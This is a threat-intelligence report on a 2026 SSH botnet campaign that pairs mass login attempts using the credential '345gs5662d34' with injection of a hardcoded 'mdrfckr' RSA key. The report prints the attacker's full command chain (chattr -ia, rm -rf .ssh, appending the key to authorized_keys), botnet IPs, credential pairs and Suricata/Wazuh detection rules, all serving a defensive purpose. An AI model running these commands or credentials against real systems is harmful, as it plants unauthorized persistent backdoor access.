TLP:CLEAR HIGH ACTIVE

345gs5662d34 / mdrfckr — Credential Stuffing + SSH Key Campaign

Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH

610K+

credential attempts

7,900

unique source IPs

258K

SSH key injections

30d

active window

Executive Summary

Over a 30-day window (2026-05-25 through 2026-06-24), sensors observed a coordinated two-phase campaign combining mass credential stuffing with SSH authorized_keys persistence. The campaign uses the credential 345gs5662d34 as both username and password, attempting 610,000+ logins across 7,900 unique source IPs. Upon successful login, the attacker injects a single hardcoded RSA SSH key (comment: mdrfckr) into ~/.ssh/authorized_keys, establishing persistent backdoor access.

The credential stuffing and key injection are performed by the same botnet — the top IPs participate in both phases with near-identical event counts. The campaign is remarkable for its scale (7,900 IPs), its single-credential approach (one password across 7+ usernames), and its awareness of Linux hardening (the chattr -ia pre-step to remove immutable attributes before modifying the SSH directory).

Threat Actor Profile

Attribute	Assessment
Campaign name	345gs5662d34 / mdrfckr (credential + key comment)
Type	Coordinated credential stuffing botnet with SSH key persistence
Sophistication	Medium — large botnet, single credential, but includes `chattr` hardening bypass
Intent	Persistent SSH access via authorized_keys for future exploitation
Botnet size	~7,900 unique IPs, globally distributed
First observed	2026-05-25
Last observed	2026-06-24 (active)

Phase 1 — Credential Stuffing

The campaign uses the credential 345gs5662d34 as both username and password, and also pairs it with common system usernames. The credential appears programmatically generated — possibly a default password from a specific IoT firmware or a botnet credential rotation token.

Credential Distribution

Username	Password	Attempts	Unique IPs
`345gs5662d34`	`345gs5662d34`	353,609	7,887
`root`	`345gs5662d34`	257,304	7,551
`ubuntu`	`345gs5662d34`	21,089	4,759
`admin`	`345gs5662d34`	15,368	4,023
`user`	`345gs5662d34`	8,176	3,172
`test`	`345gs5662d34`	6,627	2,871
`ftpuser`	`345gs5662d34`	4,793	2,406

Top Participating Botnet IPs

IP	Credential attempts	Honeypots hit	First seen	Last seen
`102.88.137.80`	1,059	24	2026-05-25	2026-06-24
`20.203.42.204`	991	36 (all)	2026-05-25	2026-06-10
`182.93.50.90`	967	34	2026-05-26	2026-06-24
`220.247.224.226`	662	33	2026-05-25	2026-06-24
`182.93.7.194`	555	34	2026-05-25	2026-06-24
`96.78.175.36`	504	34	2026-05-25	2026-06-23
`102.88.137.213`	500	36 (all)	2026-05-26	2026-06-24
`103.98.176.164`	495	35	2026-05-25	2026-06-17
`31.179.197.26`	481	35	2026-05-25	2026-06-18
`41.82.50.218`	481	28	2026-06-01	2026-06-24

Phase 2 — SSH Key Injection

Upon successful login, the attacker executes a two-command sequence to install a persistent SSH backdoor key. The attack is notable for its chattr -ia pre-step, which removes the immutable and append-only attributes that Linux hardening guides recommend setting on the ~/.ssh directory.

Attack Sequence (from `102.88.137.80`)

# Step 1: Remove immutable attributes (unlock .ssh directory)
cd ~; chattr -ia .ssh; lockr -ia .ssh

# Step 2: Replace authorized_keys with the mdrfckr RSA key
cd ~ && rm -rf .ssh && mkdir .ssh && echo \
  "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr" \
  >>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

The key injection was observed 258,551 times across 7,594 unique IPs — a near-1:1 match with the credential stuffing IPs, confirming this is a single coordinated campaign.

Campaign Cross-Reference

The same IPs perform both credential stuffing and key injection, confirming a single operation:

IP	Credential attempts	SSH key injections	Ratio
`102.88.137.80`	1,059	1,033	0.98
`182.93.50.90`	967	953	0.99
`20.203.42.204`	991	826	0.83
`182.93.7.194`	555	536	0.97

Other Notable Credentials in the Same Window

Several other credential pairs appeared at high volume during the same 30-day period, suggesting either parallel campaigns or additional credentials deployed by the same botnet:

Credential	Attempts	Unique IPs	Notes
`admin` / `admin`	39,174	2,001	Generic default credential
`support` / `support`	22,250	495	Support account default
`solana` / `solana`	9,257	32	Crypto-themed — targeted, not botnet
`ftpuser` / `J5cmmu=Kyf0-br8CsW`	10,364	10	Targeted FTP credential, 10 IPs only

MITRE ATT&CK Mapping

ID	Technique	Evidence
T1110.001	Password Guessing	610K+ attempts with single credential across 7+ usernames
T1110.004	Credential Stuffing	7,900 unique IPs performing coordinated credential spraying
T1098.004	SSH Authorized Keys	258K injections of `mdrfckr` RSA key into authorized_keys
T1078	Valid Accounts	Successful logins enable the key injection phase
T1059.004	Unix Shell	`chattr`, `rm -rf`, `echo`, `chmod` command chain
T1562.001	Impair Defenses	`chattr -ia .ssh` removes immutable attributes (hardening bypass)

Campaign Timeline

Date	Event
2026-05-25	Campaign begins. Credential `345gs5662d34` first observed. SSH key injections begin same day.
2026-05-25 → ongoing	Continuous daily activity from 7,900 IPs. Top IP `102.88.137.80` hits 24 sensors on day 1.
2026-06-10	`20.203.42.204` (the only IP to hit all sensors) stops activity after 991 attempts.
2026-06-24	Campaign still active. Multiple IPs continue credential attempts and key injections.

Indicators of Compromise

Credential IOC

345gs5662d34 — used as both username and password (primary campaign credential)

SSH Key IOC

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Command Pattern IOC

cd ~; chattr -ia .ssh; lockr -ia .ssh

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa ... mdrfckr" >> .ssh/authorized_keys && chmod -R go= ~/.ssh

Network — Top Botnet IPs

102.88.137.80 · 20.203.42.204 · 182.93.50.90 · 220.247.224.226 · 182.93.7.194 · 96.78.175.36 · 102.88.137.213 · 103.98.176.164 · 31.179.197.26 · 41.82.50.218 · 181.188.176.242 · 5.182.83.231 · 176.109.97.11 · 222.232.176.7 · 190.244.39.224

Detection Signatures

Suricata — 345gs5662d34 Credential in SSH Auth

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (
  msg:"cowrAI 345gs5662d34 credential stuffing campaign";
  flow:to_server,established;
  content:"345gs5662d34";
  threshold:type both, track by_src, count 5, seconds 60;
  classtype:attempted-admin; sid:9003020001; rev:1;
)

Suricata — mdrfckr SSH Key Injection

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (
  msg:"cowrAI mdrfckr SSH authorized_keys injection";
  flow:to_server,established;
  content:"mdrfckr";
  content:"authorized_keys"; distance:0;
  content:"chattr"; nocase;
  classtype:trojan-activity; sid:9003020002; rev:1;
)

OSSEC / Wazuh — authorized_keys Replacement

<rule id="100302" level="12">
  <if_sid>530</if_sid>
  <match>rm -rf .ssh</match>
  <match>authorized_keys</match>
  <description>SSH authorized_keys replacement detected (mdrfckr campaign)</description>
</rule>

Collection Methodology

Data collected by a distributed honeypot fleet running SSH/Telnet protocol lures. All login attempts and post-authentication commands were captured at the application layer and ingested into a time-series database for analysis. Credential pairs, source IP addresses, and command sequences were correlated across sensors to identify the two-phase campaign structure.